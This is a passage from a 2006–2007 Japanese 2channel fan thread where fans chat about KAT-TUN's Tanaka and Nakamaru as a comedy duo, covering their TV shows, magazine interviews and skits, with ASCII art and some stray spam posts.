梅チャソに逃げ惑う田中。はキャワ(*´∀`)
爺には豆に挑戦して鼻芸を極めてほしかった(w

124 :ユー&名無しネ:2006/10/22(日) 20:44:24 ID:OS2tN7Ji
>122爺同
中島姐さんスチだったし爺とのコンビも息合ってたとオモ
メグミも悪くないが…それ以降誰になるか考えると不安もある

125 :ユー&名無しネ:2006/10/22(日) 22:05:14 ID:7kqtx7BF
4ちゃんみな、

126 :ユー&名無しネ:2006/10/23(月) 00:54:42 ID:cV7b1Cyv
歌藁の田中。ロケ今回が最後だっけ?
偽オムコントも最後かと思うとサミシス
あと好きな食べ物を聞かれて「お肉とラーメン」って答えたオムに
「お前じゃねーよ!」って爺の高速ツッコミが冴えてたな(w

127 :ユー&名無しネ:2006/10/23(月) 19:36:59 ID:GRaifbQx
>126
ああいうボケツッコミの早さがスチだ(*´∀`)
下手すると田中コントよりも普段の会話の方が(ry

128 :ユー&名無しネ:2006/10/23(月) 21:38:05 ID:FD5HSiEX
ちょ…歩誌田中。ジャマイカ(*´д`*)

129 :ユー&名無しネ:2006/10/23(月) 22:07:20 ID:UGIx32iH
歩誌買ってきたノシ
写真も対談も田中。らしくて禿キャワ(*´∀`)
コーヒーカップの話って少蔵のお手紙でも言ってなかた?

130 :ユー&名無しネ:2006/10/23(月) 23:39:32 ID:Eev7b7tK
写真も内容もキャワだたな
お手紙コーナーにも出たコーヒーカップ話しがまた聞けるとは
しかし男二人(または三人)でコーヒーカップ禿バロス

131 :ユー&名無しネ:2006/10/25(水) 12:46:15 ID:FXbYFX0i
テレライにも田中。ktkr
対談テラキャワだな(*´∀`)

132 :ユー&名無しネ:2006/10/25(水) 14:51:37 ID:p1uQFyUQ
>131
ボケツッコミの応酬が田中。らしくて(・∀・)イイ!!

133 :ユー&名無しネ:2006/10/25(水) 21:47:55 ID:FXbYFX0i
森乃進のページにも名前出してもらってるナ
田中。の名前が並んでるだけでもウレシス(*´∀`)

134 :ユー&名無しネ:2006/10/27(金) 22:23:14 ID:Aku7UX5A
  
        \ ダ――ッ! /
         ∧_,,∧  ∧_∧
        (#・A・)(冫、 )
        と'   O O  "つ


135 :ユー&名無しネ:2006/10/28(土) 00:11:54 ID:Ywv72yoc
オリスタでもボケツッコミ健在だたな(*´∀`)ホコーリ
オムは夕立の司会ではないとは思うが(w

136 :ユー&名無しネ:2006/10/28(土) 13:54:27 ID:zP3zF3o1
>133
(゚Д゚≡゚Д゚)エッナニナニ?
それはテレライの話?

137 :ユー&名無しネ:2006/10/28(土) 19:02:39 ID:XwETVw7z
今週ないの忘れてたorz

138 :ユー&名無しネ:2006/10/28(土) 23:40:03 ID:Ywv72yoc
>136
テレライのはねトビ連載のとこだとオモ
爺が子供たちに知られててよかった(*´∀`)

139 :ユー&名無しネ:2006/10/31(火) 21:12:33 ID:V+LntIHp
オリスタブログに取材裏話でてたな

140 :ユー&名無しネ:2006/11/01(水) 20:18:26 ID:cBIOLJJn
>139
見てきたノシ
仲良さそうな雰囲気が対談にも現れてるな(*´∀`)
田中。ってプラベで一緒に漫才見に行ったりCDの情報交換したり
遊びながらも仕事に役立てようって向上心があるとこがイイ!

141 :ユー&名無しネ:2006/11/02(木) 22:28:47 ID:ac0N7urp
ひょっとして今週地上波初コント?

142 :ユー&名無しネ:2006/11/02(木) 23:41:33 ID:sM7JD62Y
>141
Σ(゚Д゚)爽言えばそんなレポあったよね
田中。担としてはテラ楽しみだけどちょと不安
急にドチドチしてきたよ
でも放送されなかったらどうしよう(w


143 :ユー&名無しネ:2006/11/03(金) 13:08:45 ID:OLw/ZSLE
先週のオリスタずっと探したけど何処にも無くて買えナカタorz
何n載ってて写真がどうだったとかどなたか教えて呉んか脳(´Д⊂ヽ

144 :ユー&名無しネ:2006/11/03(金) 18:47:17 ID:Kesx5G3z
【速報】
人気アイドルKAT−TUN、年内いっぱいでグループ活動休止へ

http://e.pic.to/3dxnw


スポーツ報知 2006年11月3日(金)

145 :ユー&名無しネ:2006/11/03(金) 22:21:25 ID:cKe0DKkc
144はグロらしいよ

146 :ユー&名無しネ:2006/11/03(金) 22:30:37 ID:nlrajKV+
あちこちに貼ったんダナ

>143
BNもないの?

147 :ユー&名無しネ:2006/11/03(金) 22:37:16 ID:cKe0DKkc
>143
オリスタの田中。は見開きで2n
左nは写真で夕立初回の服装でビズ良しオムは髭有
右nはインタビュー
コンビを組む相手がお互いでよかったことは?
オム「突っ込んできれるから安心してぼけられる」
爺「オムくんが昔からかわらないのは声や体を張るのが得意なこと。それがこの番組では生きる」
他には理想の司会とか他の出演者についてとか

148 :ユー&名無しネ:2006/11/04(土) 10:49:58 ID:1F8Gleby
芋誌表紙なのか(゚Д゚)
正確には中中々だが(w

149 :ユー&名無しネ:2006/11/04(土) 11:10:25 ID:mavR5hVR
>146
Σ(゚д゚lll)BN買えばいいのかスマソ
>147
姐さん詳しくdddだいしてます

150 :ユー&名無しネ:2006/11/04(土) 14:04:52 ID:ezRZU3lM
>149
田中。が表紙なのか?
ビクーリだ

151 :ユー&名無しネ:2006/11/04(土) 14:43:18 ID:CgSOhIES
オム爺とりんってナカナカいいじゃんの赤ハッピ思い出すな(w

152 :ユー&名無しネ:2006/11/04(土) 15:22:25 ID:m7uBkTCy
>147
つ半角カナ

153 :ユー&名無しネ:2006/11/04(土) 17:43:00 ID:5NXvsBFx
>151
懐かスィ(w
いつの話だったかなそれ

てか芋誌表紙は本当なのか?
夕立関連なのか脳

154 :ユー&名無しネ:2006/11/04(土) 22:28:29 ID:qF3NiALW
>153
波に載ってたよ
表紙とピンナップが田中。

155 :ユー&名無しネ:2006/11/05(日) 10:31:11 ID:ztI5d7ZV

               /⌒ヽ < オムオタオメデスシー
             /(冫、*)ヽ
            /   ー‐'´  `、
          ∠_______i
          .|_______|_
  ∧_,,∧   / |::o::o::::::::o::::o::::0::| \
 (* ・A・)  /  .| ̄ ̄ ̄ ̄ ̄ ̄ ̄|   |
 O_UUっ |    ̄ ̄ ̄ ̄ ̄ ̄ ̄   /
       \_________/


156 :ユー&名無しネ:2006/11/05(日) 12:57:37 ID:0iR3Kr+w
今日の夕立の番協参加したんだが
もう1つ田中。コント(留守電話の新バーゾン)を披露してた

コーナーの合間に2人で苺をイジったりルービックキューブで遊んだり
オムが迷彩衣装のファスナーを一番上まで上げで敬礼ポーズすると
爺が「兵隊さん!?」とツッコんで遊んでた

長文スマソ

157 :ユー&名無しネ:2006/11/05(日) 19:38:09 ID:6sj55tfc
>156
番協姐さんd!
合間にじゃれ合ってる田中。想像するだけでキャワ(*´∀`)
カットされたコントも内容覚えてたら詳しくおながいします

それにしてもオム誕生日に地上波で田中。コント初披露
オマケに歌藁もあるなんて贅沢な一日棚

158 :ユー&名無しネ:2006/11/05(日) 22:57:22 ID:0iR3Kr+w
>157
カットされたネタは爺がオムに電話したら留守電で(留守電の声役はオム)
だんだん留守電の声が弱って行き
発信音が生命反応の音のピーだたというネタ

内容的にカットだったのかもな

159 :ユー&名無しネ:2006/11/05(日) 23:16:31 ID:6sj55tfc
>158
dd!たしかにシュールだ(w
それはちゃんとコケてもらえた?
旧バーゾンの0.5秒以内にってネタなら放送できたかもな

>155オム
その苺食ったら腹壊しそうだからやめとけ(w

160 :ユー&名無しネ:2006/11/06(月) 00:41:47 ID:n/RiF1w+

                /.`ヽ.
              /、:::::::'')ヽ
             /   ー‐'´ `、
           ∠_______i
           |_______|_
          /|::o::o::::::::o::::o::::0:::| \
  ∧_,,∧    /  | ̄ ̄ ̄ ̄ ̄ ̄ ̄|   |
 (#・A・) <もう食ってる ̄ ̄ ̄ ̄   /
 (つ/`'´O    \________/
 と(冫、;;)
   ー‐'´

161 :ユー&名無しネ:2006/11/06(月) 00:45:25 ID:rQUXdK/q
>158
そのネタにもボンキュッボンと同じような感じで
どこがおもしろいのかわからないと言われていたよ(w

>155オム
腹壊すなよ

162 :ユー&名無しネ:2006/11/06(月) 00:48:05 ID:rQUXdK/q
159姐さんにレスするつもりが
自分にレスしてしまた

芝ジュース飲んで逝ってくるノシ

163 :ユー&名無しネ:2006/11/06(月) 17:24:45 ID:n/RiF1w+
>161
丼米そしてd
まぁ下手にアゲアゲされるよりネタで落とされたほうが
寒い空気にならなくてヨカタかもな(w

歌藁一緒のロケじゃなかったのは残念だったけど
スタジオは一緒で仲良さそうだったし六感もカコヨスだた
でも来週は2人ともいないんだよね(´・ω・`)

164 :ユー&名無しネ:2006/11/11(土) 01:47:01 ID:ZtWmkr+5
片目誌にも田中。ktkr

165 :ユー&名無しネ:2006/11/11(土) 23:20:05 ID:L4Qr53ar
夕立wktk

166 :ユー&名無しネ:2006/11/12(日) 11:31:07 ID:FTgNAU7W
wikiのかつん項目の、CMんところに
ミサワホーム 田中・中丸(共演:東山紀之)
とあるんだがコレ既に過去にやったやつ?それとも予定?

167 :ユー&名無しネ:2006/11/12(日) 12:45:31 ID:oUWLs+kF
芸人街道まっしぐらですな
オープニングの絡みキャワ

168 :ユー&名無しネ:2006/11/12(日) 13:48:43 ID:IN8CQg/E
今日はOPから肩コテンキタ━━━━━(゚∀゚)━━━━━!!
芸人街道すぎてバロスだたがモエス(*´∀`)

169 :ユー&名無しネ:2006/11/12(日) 15:04:29 ID:M+Eopbg3
OPの肩にもたれかかり頭撫でモエスだたよな(*´∀`)
オムの弘法も筆の誤りにもウケた(w

>166
ミサワホームのCMは千菓子と中堅が先輩後輩リーマンって設定で
お宅拝見っぽいのにズニアが結構出てた
オム爺のもカツン結成前なんじゃまいか?
それよりオマイはゴミや半角カナに気をつけてくれ

170 :ユー&名無しネ:2006/11/12(日) 15:25:18 ID:UTLjVXQ5
オム文殊の知恵ってちゃんと言ってたように聞こえたけど違うんかな
あと「弘法も〜」の方は暗に当たるぞという脅し?(w




171 :ユー&名無しネ:2006/11/12(日) 17:53:54 ID:YeJZvcxW
弘法にも〜って猿も木から落ちるみたいなカンジだよな(w
怯える爺に追い打ちをかけるオムワロス
文殊は微妙に噛んでるだけで言葉そのものは知ってるとオモ

172 :ユー&名無しネ:2006/11/13(月) 10:59:01 ID:wxA/74+a
>170
自分も文殊の知恵って聞こえた
でもあそこでだと三本の矢の話をしたかったのかなという気はする(w

173 :ユー&名無しネ:2006/11/13(月) 18:56:59 ID:JvxsoPyh
>169
d!そのCM見たかったお
スマソwikiそのままコピペしちゃって

肩コテンは悶え死ぬかとオモタ…
ビビりすぎな爺と噛み噛みなオムがカワユス

174 :ユー&名無しネ:2006/11/17(金) 00:03:19 ID:nzaGa+sY
ちょ今週の夕立高校サカーで潰れとるorz
他は放送あるよね?

175 :ユー&名無しネ:2006/11/17(金) 18:54:51 ID:Y2JJEFVC
>174
日テロは普通に放送あるよ
高校サッカーって地方予選とか?

176 :ユー&名無しネ:2006/11/18(土) 14:26:07 ID:DEuRCPRM
>175
うんそう
地方の決勝戦で潰れたんだ(;´Д`)
でも帝都の知人に録画頼めたからひとまず安心

177 :ユー&名無しネ:2006/11/19(日) 14:13:27 ID:mnsLlDSa
仰天人間に田中。が挑戦しないと物足りない自分はスッカリ芸人担orz
ポロリもあるよってオムにナイナイナイって爺の高速ツッコミはナイスだた
あとオムが爺のこと噛み噛み言ってたけどオムも負けずに噛んでるよな(w

178 :ユー&名無しネ:2006/11/20(月) 22:09:34 ID:jKTdcXDC
昨日は夕立見れなかった姐さんも多いのかな?
ヘドスピンに挑戦するとりんを2人で支えてあげる田中。もなんかキャワだた

179 :ユー&名無しネ:2006/11/21(火) 12:45:34 ID:KJZvL277
爺少蔵でオム語りしてたらすぃな
見たかったよママン

180 :ユー&名無しネ:2006/11/21(火) 15:28:05 ID:kwGgYD4c
>179
パラにカツンのこと聞かれてオムの坊主をネタにしたとか見たけど
それって放送されない部分のトークなんだろうか?
詳細知ってる姐さんいたらヨロ

181 :ユー&名無しネ:2006/11/21(火) 19:13:50 ID:VVs+F4+1
確か2回は話に出てたとオモー
カツンで個性と言えばと聞かれて
「田中くんですねーだって坊主ですよ!」みたいな事言ってた
もう1個は忘れたorz
個性の話は放送される可能性もあるとオモ

182 :ユー&名無しネ:2006/11/21(火) 20:10:33 ID:kwGgYD4c
>181
dです!
放送されるといいな

183 :ユー&名無しネ:2006/11/21(火) 20:21:14 ID:heFzSwQA
オムの隣りにいるとそれ以上に喋ろうと思うと言ってたラスィ
切磋琢磨な田中。イイヨイイヨー(*´∀`)

184 :ユー&名無しネ:2006/11/22(水) 13:25:00 ID:hY61P/Vp
>183
田中。のそういうとこスチだ
お互いに刺激し合ってどんどん成長してホスィ

185 :ユー&名無しネ:2006/11/24(金) 20:09:36 ID:3iwjY3Ls
ヾ(冫、ヽ(・A・#)オマイスンノー!?

イキピターリな田中。(・∀・)イイ!

186 :ユー&名無しネ:2006/11/24(金) 22:32:54 ID:V8W1+894
>185
自分もそこキャワだと思った
悪ノリする小学生みたいだたな

あと月ジョンのウザイくらい息ピッタリな田中。もさすがだ(w

187 :ユー&名無しネ:2006/11/25(土) 21:42:18 ID:VtJM0/TW
>185
スマソそれ何だっけ?
月ジョンの息ピターリはさすがだったな(w

188 :ユー&名無しネ:2006/11/26(日) 09:52:07 ID:s74xrYE3
>187
185じゃないけど金曜日にやった歌藁の番宣だよ

189 :ユー&名無しネ:2006/11/26(日) 12:40:44 ID:JPPJ1Lq7
ユー

190 :ユー&名無しネ:2006/11/26(日) 13:15:41 ID:zzIIgbaq
オムリアル照る照る坊主(w
爺あんま出番なかった…

191 :ユー&名無しネ:2006/11/26(日) 21:33:52 ID:2VEeQkcg
オムテル坊主にはお茶の雨が降って棚(w
ルーレットのとき「ちょっと待ってくださいよー」って言う田中。も息ピターリだたね

ウタワラのメドレーは前にクラブでやったのと似たような曲順だけど
ダンシとかステージングは今日のが$ちっくでモエスだた(*´∀`)

192 :ユー&名無しネ:2006/11/28(火) 19:24:47 ID:YsM4ZZk4
新曲カプリングに田中。の掛け合いkrkr
やっぱり禿簿小村だよな?歌の掛け合いってことは…ないか(w

193 :ユー&名無しネ:2006/11/30(木) 00:59:52 ID:NfN9pMgX
美茄子のオムの変顔と爺のうさんくさい笑顔キャワだたな
芸人コーナーのときも2人とも楽しそうでよかた(*´∀`)

194 :ユー&名無しネ:2006/12/03(日) 12:33:51 ID:b6Wqxljb
ユー

195 :ユー&名無しネ:2006/12/03(日) 12:49:05 ID:gdoCZKY7
今日も田中。バロス
何かと爺をかくまおうとするオムがキャワ

196 :ユー&名無しネ:2006/12/03(日) 12:54:09 ID:ZJ+nZK64
今日の夕立おもしろかった
田中。が体張らされたときのリアクション(・∀・)イイ!!
ところで棒人間は正真正銘のシロートさん?

197 :ユー&名無しネ:2006/12/04(月) 17:11:27 ID:mW24Ugdq


198 :ユー&名無しネ:2006/12/04(月) 19:38:17 ID:NiEDWHSg
カバちゃんはオムのファンらしい(w
JOKERも知ってたしアルバム曲でラップ詞がある曲はってクイズも正解してた

199 :ユー&名無しネ:2006/12/04(月) 20:08:52 ID:fdBgYeCx
>196
勿論ゲイニソさんだよ

しかしオムは本当に全部振られるな
棒人間とかは爺のビビリっぷりも見たかった(w

200 :ユー&名無しネ:2006/12/05(火) 08:12:24 ID:CDHzw0K3
|
| 200ゲットだゴルァ
|
 ̄ ̄ ̄V ̄ ̄ ̄ ̄ ̄ ̄
    ∧_,,∧     ∧_∧
   (* ・A・)__(冫、*) <ヌクヌクデスワー
   / /~ ※  ※  \ )
   /※  ※  ※  ※ \
  ~~~~~~~~~~~~~~~~~~~~~~

201 :ユー&名無しネ:2006/12/06(水) 00:04:46 ID:aAMLURtz
>200
   ∧_,,∧      ∧_∧
  (* ・A・)(*´∀`)(冫、*) <ヌクヌクデスワー
   / /~ ※  ※  \ )
   /※  ※  ※  ※ \
  ~~~~~~~~~~~~~~~~~~~~~~

202 :ユー&名無しネ:2006/12/06(水) 03:15:31 ID:GBLLZTBn

      ∧_,,∧ ∧_∧ .∧_∧
     .(#・A・)(*´∀`)(冫、;) <セマイデスシー
  ∧_∧ / ,,/ ̄※ ̄※ ̄\ ) .∧_∧
c(´∀`*)⌒丿 ※ ∧_∧ ※ ヾ⌒(*´∀`)っ
~~~~~~~~~~~~~~O(*´∀`*)O~~~~~~~~~~~~~~

203 :ユー&名無しネ:2006/12/06(水) 03:26:49 ID:GBLLZTBn
フレパのカバちゃんクイズ正解は他にで犬もテロップで出て棚
むしろカバちゃんが解答してくれたらネ申だたのに(w

>199
芸人さんなのかΣ(゚Д゚;)
なんの紹介もなかたからテキーリ無茶なシロートだと

204 :ユー&名無しネ:2006/12/06(水) 18:21:53 ID:o3JaVkpP
爺新連載で早速オムの名前ktkr

205 :ユー&名無しネ:2006/12/06(水) 18:26:16 ID:cS49sisG
爺を心配してわざわざ電話したんだったら萌えすぎて氏ねる
HBBは喉が命だからな(*´∀`)

206 :ユー&名無しネ:2006/12/06(水) 19:03:30 ID:iHqwwgom
あの書き方じゃワカンネ-がどっちか風邪なら心配だ
これからも爺の連載でオムの名前が出るといいな(*´∀`)

207 :ユー&名無しネ:2006/12/07(木) 03:00:48 ID:aZBq/PlX
ラジオでもオムと電話でそろそろ一緒にご飯行こうって話した言ってたんだよな
実現したら連載で報告してくれよ爺

208 :ユー&名無しネ:2006/12/07(木) 20:19:05 ID:stRab096
今うたばんで田中君が付けている腕時計のブランドわかる人いませんか?
携帯からですみません。

209 :ユー&名無しネ:2006/12/08(金) 21:36:28 ID:wz0/rm2y
ミニステでオムの肘が当たったせいで爺がマイク歯にぶつけてるよな(w
まったく気づかないオムと秘かに痛がる爺ワロス

210 :ユー&名無しネ:2006/12/09(土) 12:24:51 ID:V7e8BP8y
ё

211 :ユー&名無しネ:2006/12/10(日) 08:16:06 ID:sdMFeHu6


212 :ユー&名無しネ:2006/12/10(日) 12:52:16 ID:9N5Tw1Am
また夕立で田中。コントキタな(*´∀`)
ガイシュツネタだったけど前はこぶとり爺さんて80`くらいなかったか?(w

213 :ユー&名無しネ:2006/12/10(日) 13:28:06 ID:oZyK1wY4
>212
82だたな
夕立のはリミックスだとオモ(w
体重聞く前の爺の台詞も短かった
でも周りがウケててホコーリ(*´∀`)

214 :ユー&名無しネ:2006/12/10(日) 13:52:05 ID:RrF6PgPM
何でオムていうの?
なんで爺っていうの?

215 :ユー&名無しネ:2006/12/10(日) 17:53:53 ID:hoaletpQ
>212
自分が覚えてる限りで最初に見たのは
オムがかなりの関取声で「82`!」て言ってたヤツかな
小太りじいさんの体重増減が地味に気になるネタだ(w

216 :ユー&名無しネ:2006/12/11(月) 18:29:28 ID:elOKUR65
ペー爺でまたオムの名前ktkr
爺意味が解らないよ爺(w

217 :ユー&名無しネ:2006/12/11(月) 19:22:07 ID:JhoRyRBS
見てきた
爺木になるよ爺(w

218 :ユー&名無しネ:2006/12/11(月) 23:58:39 ID:29Qcv686
ラジオの
(#・A・)カツンの爺……オムです
にもビビッタyo

219 :ユー&名無しネ:2006/12/13(水) 18:08:30 ID:7/E8QZ57
またまたペー爺にオムの名前ktkr

220 :ユー&名無しネ:2006/12/13(水) 18:53:46 ID:tRtCcyD5
夕立の次はペー爺か…
住み分けもできないルシ厨('A`)

221 :ユー&名無しネ:2006/12/13(水) 20:27:31 ID:CG7Q6VxM
自分は雑談興味ナスだしルシは情報スレロムってるくらいだけど
実際壷のユニスレは機能してないしルシには個人スレコンビスレないし
両方利用してる姐さんが多いとオモ
夕立なんてオム爺の個人スレでも使ってるしな
ただルシは田中。担の肩身狭いしルシ用語イヤンな姐さんがいるのもわかる
問題はここ独自の呼び方を決めようにも住人が少ないこと棚(w

222 :ユー&名無しネ:2006/12/13(水) 21:33:00 ID:oY7g5P7I
夕立は普通に使うモンだと思ってた

223 :ユー&名無しネ:2006/12/13(水) 23:51:26 ID:PynRQ8Ku
夕立ユニスレで使ってなかったか?

224 :ユー&名無しネ:2006/12/14(木) 00:04:40 ID:Fh/knPIu
自分は番組名書かずにレスしてた(w
2ネームなんて誰かが面白いのを付ければ
それが共通に使われるだけなんで出典は気にしてナス
ただアソコは裏の頃からラプとHBCイラネだったから印象は良くないな

225 :ユー&名無しネ:2006/12/14(木) 00:09:59 ID:Jfczg2tA
テレガイのオムソバメシに
キター━━━━(゜∀゜)━━━━!!
とオモたのは自分だけか脳(´・ω・`)

226 :ユー&名無しネ:2006/12/14(木) 00:17:40 ID:rILci90S
正直どこでも肩身せま(ry
でも某所は最近そうでもないけどな
ここ以外でコンビ話なんて絶対しないけど

227 :ユー&名無しネ:2006/12/14(木) 01:29:45 ID:YpFipUzr
梨にユニスレがあったころから肩身せまかったよな(w
だからこそ自分はこのスレがマターリしててくれればそれでいい

>244
HBCじゃなくてHBBな

228 :ユー&名無しネ:2006/12/14(木) 01:43:10 ID:Jfczg2tA
>244
HBC…Σ(゜д゜lll)
なんで間違えたんダロ_| ̄|○

爺スマソ

229 :ユー&名無しネ:2006/12/14(木) 01:49:08 ID:rILci90S
姐さん達どこにレスしてるんだ
もちついて呉(w

230 :227:2006/12/14(木) 08:08:12 ID:YpFipUzr
テラハズカシス(ノ∀`)
HBCに田中。を指名しに逝ってくる

231 :224,228:2006/12/14(木) 15:04:41 ID:Jfczg2tA
'`,、'`,、('∀`)'`,、'`
自分はHBCの清掃に逝くよ_| ̄|○


m9You!って書いても姐さん達ならわかってくれる?

232 :ユー&名無しネ:2006/12/14(木) 17:34:43 ID:YpFipUzr
m9はロゴマークの指だよな?
だったらシンプルにm9だけでもいいとオモ
あと!は全角で頼む

233 :ユー&名無しネ:2006/12/14(木) 22:42:27 ID:Jfczg2tA
>232

わかってくれてウレシス(*´∀`)

234 :ユー&名無しネ:2006/12/16(土) 02:17:39 ID:7JQCR+Ur
m9賛成ノシ 地方で映らないけどw
ペー爺ラストが目になっちゃってガカリ
オムの話題コイコイ

235 :ユー&名無しネ:2006/12/16(土) 10:01:44 ID:uMziLkZW
>234
スマソが色々おかしいから少しロムって呉

236 :ユー&名無しネ:2006/12/24(日) 14:51:34 ID:R7i1DYlQ
毒な爺モエス
ビビる田中。モエス

237 :ユー&名無しネ:2006/12/25(月) 18:34:00 ID:/XjURoMp
爺テーブルゲームをどうしたいの爺

238 :ユー&名無しネ:2006/12/30(土) 21:23:46 ID:RMXsYUBS
ダンス甲子園久しぶりの耳打ちにモヘた
小窓だったけどな(w

239 :ユー&名無しネ:2006/12/31(日) 00:27:23 ID:9vH6rwx9
最後高校生の真似して抱擁してたのがキャワだた

240 :ユー&名無しネ:2006/12/31(日) 08:34:40 ID:XbW+1MiI
>238
ナカーマ(´∀`*)ノシ


241 :ユー&名無しネ:2007/01/03(水) 21:31:22 ID:n1KbDLxu


242 :ユー&名無しネ:2007/01/07(日) 11:11:15 ID:MoUuVmko
ショップ写真(*´∀`)

243 :ユー&名無しネ:2007/01/07(日) 17:27:36 ID:rA/ykpAd
夕立のゲプ予告で覚悟してたせいか意外と耐えられた
むしろオム爺キャワと思ってしまった(w

>242
kwsk!

244 :ユー&名無しネ:2007/01/08(月) 01:05:09 ID:7OTjTrY0
>242
kkkkwsk

245 :ユー&名無しネ:2007/01/08(月) 17:34:12 ID:Kzk6FpnH
ジャニショの新作写真で田中。がじゃれてる

246 :ユー&名無しネ:2007/01/08(月) 20:09:38 ID:5VlFmwwG
爺の寝る時のBGM、何げに犬が多い件(*´∀`)

247 :ユー&名無しネ:2007/01/11(木) 23:45:04 ID:aKOl3e7Y
http://tv9.2ch.net/test/read.cgi/jr/1159968729/l50

248 :ユー&名無しネ:2007/01/14(日) 12:49:32 ID:ZAa3QdjJ
今日の夕立ヨカタ
しかし爺Sコメだな(w

249 :ユー&名無しネ:2007/01/15(月) 00:35:54 ID:JMravjTR
コーヒーカップ話も聞けたし内容もワロスだたな
欲を言えば田中。のレシート見たかった(W

250 :ユー&名無しネ:2007/01/15(月) 08:30:45 ID:tYfIOYlh
>249
つw

でも遊園地で気づかれなかったのはデブ前の話だよな(w

251 :ユー&名無しネ:2007/01/15(月) 09:45:52 ID:JMravjTR
>250
スマソミスった

コーヒーカップはかなり前だよな
2人同時に説明しだす田中。にワロタ

252 :ユー&名無しネ:2007/01/15(月) 10:16:44 ID:pFy4DgTi
夕立今回視聴率いくつだった?

253 :ユー&名無しネ:2007/01/15(月) 18:44:03 ID:UqHn5QCq
爺次の紺でショートコントやりたいのかな
チト不安だが楽しみにしておく(w

254 :ユー&名無しネ:2007/01/21(日) 13:04:57 ID:BNJujL1i
今日の夕立なんかあったのかな?
筧ちゃんとのトーク楽しみにしてたから残念だた(´・ω・`)

255 :ユー&名無しネ:2007/01/21(日) 13:05:16 ID:+aO+mzCN
肩コテンキタワァ(AAry

256 :ユー&名無しネ:2007/01/22(月) 08:16:48 ID:4pBn8nOb
>255
田中の肩コテソは爺が微動だにしないのが禿萌えるんだよな
されるがままの爺モエス

257 :ユー&名無しネ:2007/01/27(土) 09:26:44 ID:7Y+47rL0
爺の断髪式ワロス

258 :ユー&名無しネ:2007/01/27(土) 17:40:38 ID:GMnDFkE8
髪切らせてもらった揚げ句波にうpする爺バロスバロス

259 :ユー&名無しネ:2007/01/29(月) 08:32:35 ID:Ddcfag/f
美容院までは行かなきゃいけないのに大人しく切らせるオムもバロス
一番目立つ所であれと祈ってる(w

260 :ユー&名無しネ:2007/01/29(月) 12:49:53 ID:8QN8RAw9
昨日の夕立もモエバロス
ミニー帽子被らせんな爺

261 :ユー&名無しネ:2007/01/29(月) 14:23:23 ID:eH05w2mU
ウタワラも最後まで田中担には優しい番組だたよな(w
小村禿簿がテレビで見れなくなるのはサミシス

262 :ユー&名無しネ:2007/01/30(火) 00:27:13 ID:JoHtiUmi
>266
つ。

ヤパーリ小村禿簿セッションテラ隙だ
爺のラプも隙だからまたバランスみたいなラプ掛け合い見れたらいいな

263 :ユー&名無しネ:2007/01/30(火) 00:30:45 ID:JoHtiUmi
>261だた未来レススマソ

264 :ユー&名無しネ:2007/01/30(火) 06:14:26 ID:VHB7bdan
>256
ウタワラのツンツン頭で肩コテソされたら刺さりそう棚(w

       ∧_∧
  ,ヾ从∧;(冫、;) <チクチクシマスシー
 (#・A・)ノつ 0
 ( ⊃ /(_つ 丿
  し" J   し

265 :ユー&名無しネ:2007/01/30(火) 06:24:23 ID:VHB7bdan
連投スマソ
一週間ぶりにアク禁解除されたワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・* !!!!!
巻き添え食ってる間にオムの髪型変わっちゃったよorz

266 :ユー&名無しネ:2007/01/30(火) 08:50:58 ID:pWnFFTL4
>262
ではあえて。

爺犬リピ率高いよ爺

267 :ユー&名無しネ:2007/01/30(火) 17:29:40 ID:1SVH9jun
ユー達の歌収録が木になる木

268 :ユー&名無しネ:2007/01/31(水) 06:22:14 ID:8aYg5ssv
田中。なのかカツンなのか気になるな
どっちにしろオム爺はいるんだしwktk(・∀・)

269 :ユー&名無しネ:2007/01/31(水) 13:35:20 ID:fHWcb6pF
(*冫、 ) レンドラシュエンメデタイデスシー

270 :ユー&名無しネ:2007/02/01(木) 08:38:49 ID:O5NTCpW0
>269
いつか共演できるといいな(w

271 :ユー&名無しネ:2007/02/02(金) 08:03:55 ID:2WwnOUQf
>270
悲しいことを言ってやるな(w
2人の番組持ってるから贅沢は言わないが
またドラマ共演してホスィ(-人-)
できれば連ドラで(-人-)ナモナモ

272 :ユー&名無しネ:2007/02/04(日) 12:48:05 ID:lxZlhuF5
夕立だいぶ共演者と慣れてきたけど田中。の絡みが一番イイ

273 :ユー&名無しネ:2007/02/04(日) 15:15:25 ID:qBKBxMEF
内容ってかテンポは初期よりよくなってるし安心して見れるようになた
ただ願わくばもっと田中。にスポットを当ててホスィ

274 :ユー&名無しネ:2007/02/04(日) 15:38:12 ID:kKsNNA5/
田中はワキガ

275 :ユー&名無しネ:2007/02/05(月) 08:09:28 ID:GT9Rz85/
\(^_^)/

276 :ユー&名無しネ:2007/02/08(木) 22:04:11 ID:dZeCdhDn
自分どっちか担だったけど最近田中。をやっとスチになってきた…
なんとなくスチになれなかったけど最近夕立の田中。のキャワさに癒されるわ
むしろ2オシになった鴨(w

277 :ユー&名無しネ:2007/02/08(木) 23:12:11 ID:vnDMe8Wo
>276
いらっさい つ旦~
姐さん色々と正直杉(w

これからも田中。に癒されてくれたらウレシス

278 :ユー&名無しネ:2007/02/08(木) 23:34:53 ID:z9G86m/D
田中。は揃うとうるさいのに癒し系だよな(w

ところでオム爺が原宿でロケしてたみたいだな
夕立がロケ番組になるのか春のスペサルとかなのかwktkすぎる

279 :ユー&名無しネ:2007/02/11(日) 13:56:44 ID:L15tqrIX
夕立のEDコンビ曲かユニ曲だと思ってたのにオムソロでビクーリした(w
来週は爺ソロで再来週はコンビ曲だと(・∀・)イーネ

280 :ユー&名無しネ:2007/02/12(月) 01:10:02 ID:dD6QSe+X
歌声がどつよに似ててビクーリした
そして、どつよが歌ったほうが上手いであろうナーとも思った

281 :ユー&名無しネ:2007/02/18(日) 11:35:38 ID:Lq7Mju8k
   +
+  ∧_∧ +
 +(0゚・∀・) あと10分
  (0゚つと) +
+ と_)_)


282 :ユー&名無しネ:2007/02/18(日) 13:02:18 ID:3PH2fJOL
今日の夕立おもしろかた(*´∀`)
来週の新コーナーもwktk

283 :ユー&名無しネ:2007/02/18(日) 15:30:14 ID:osVPns5r
新コーナーすごく面白そうだね(*´∀`)
いきなり刈りだすオムにビビったけど(w

284 :ユー&名無しネ:2007/02/19(月) 05:39:16 ID:HXOdct0/
とりあえずsageを知らない方は逝けですわ


wwwwwwwwwww

285 :ユー&名無しネ:2007/02/19(月) 08:08:24 ID:fu9K05BG
ユーチューブみたいに動画も投稿できる芸能人の秘蔵映像発見!!
みんなのお宝映像も投稿できるよ!
http://tv9.2ch.net/test/read.cgi/actor/1124474524/282


